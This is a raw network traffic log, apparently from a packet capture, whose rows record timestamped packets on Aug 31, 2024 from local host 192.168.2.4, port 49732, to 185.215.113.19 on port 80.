Aug 31, 2024 22:41:57.749403954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749430895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749460936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749476910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749511003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749545097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749572039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749596119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749620914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749646902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749671936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749696016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749730110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749748945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749777079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749797106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749830008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749857903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749885082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749910116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749939919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749963999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.749994040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750020027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750045061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750071049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750102997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750128984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750158072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750184059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750207901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750236034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750262976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750288010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750313997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750339985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750365973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750391006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750420094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750441074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750474930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750497103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750530958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750545025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750572920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750598907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750628948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750662088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750691891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750720978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750746965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750770092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750797033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750822067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750852108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750866890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750895977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750922918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750946999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750971079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.750996113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751032114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751053095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751081944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751106024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751135111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751161098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751187086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751213074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751236916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751261950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751286983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751312017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751336098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751359940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751389027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751425982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751456022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751482964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751507044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751533031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751559973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751586914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751607895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751635075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751661062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751687050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751714945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751738071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751763105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751825094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751852036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751879930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751905918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751924992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751957893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.751982927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752007008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752032995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752060890 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752098083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752110004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752136946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752166986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752197027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752223969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752247095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752274990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752302885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752326965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752351999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752377987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752402067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752427101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752454042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752484083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752505064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752530098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752558947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752585888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752614021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752639055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752665997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752690077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752717018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752743006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752767086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752793074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752819061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752842903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752871037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752892971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752926111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752950907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.752981901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753005028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753031015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753058910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753084898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753108978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753135920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753164053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753181934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753209114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753236055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753264904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753288031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753313065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753339052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753365040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753395081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753422976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753444910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753472090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753494024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753520012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753546000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753571987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753596067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753621101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753648996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753676891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753704071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753731012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753747940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753781080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753804922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753835917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753858089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753884077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753909111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753935099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753958941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.753984928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754014015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754040003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754062891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754091978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754117012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754153013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754179001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754203081 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754231930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754252911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754287004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754304886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754337072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754359961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754388094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754417896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754443884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754468918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754494905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754518986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754544973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754571915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754596949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754625082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754648924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754673958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754698992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754723072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754755020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754776955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754803896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754832983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754854918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754877090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754905939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754931927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754961967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.754988909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755012035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755036116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755059004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755083084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755112886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755140066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755168915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755192041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755214930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755238056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755259991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755287886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755310059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755331039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755364895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755378962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755403996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755429029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755454063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755479097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755506992 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755532026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755558968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755578995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755599976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755625010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755650043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755675077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755697966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755724907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755747080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755772114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755796909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755820990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755850077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755877018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755894899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755919933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755944014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755964041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.755989075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756038904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756078005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756078005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756105900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756181002 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756248951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756261110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756285906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756323099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756323099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756347895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756371021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756386042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756402016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756438971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756458044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756587982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756611109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756628990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756648064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756668091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756690979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756715059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756732941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756755114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756767988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756789923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756824017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756839991 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756864071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756886959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756906986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756927013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756938934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756966114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756975889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.756993055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757014036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757114887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757139921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757157087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757180929 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757199049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757241964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757258892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757282019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757303953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757319927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757340908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757355928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757379055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757395983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757415056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757433891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757450104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757471085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757496119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757519007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757531881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757555008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757575989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757595062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757610083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757631063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757648945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757672071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757692099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757710934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757720947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757745981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757766962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757786989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757805109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757824898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757848024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757867098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757880926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757901907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757924080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.757936954 CEST	49732	80	192.168.2.4	185.215.113.19
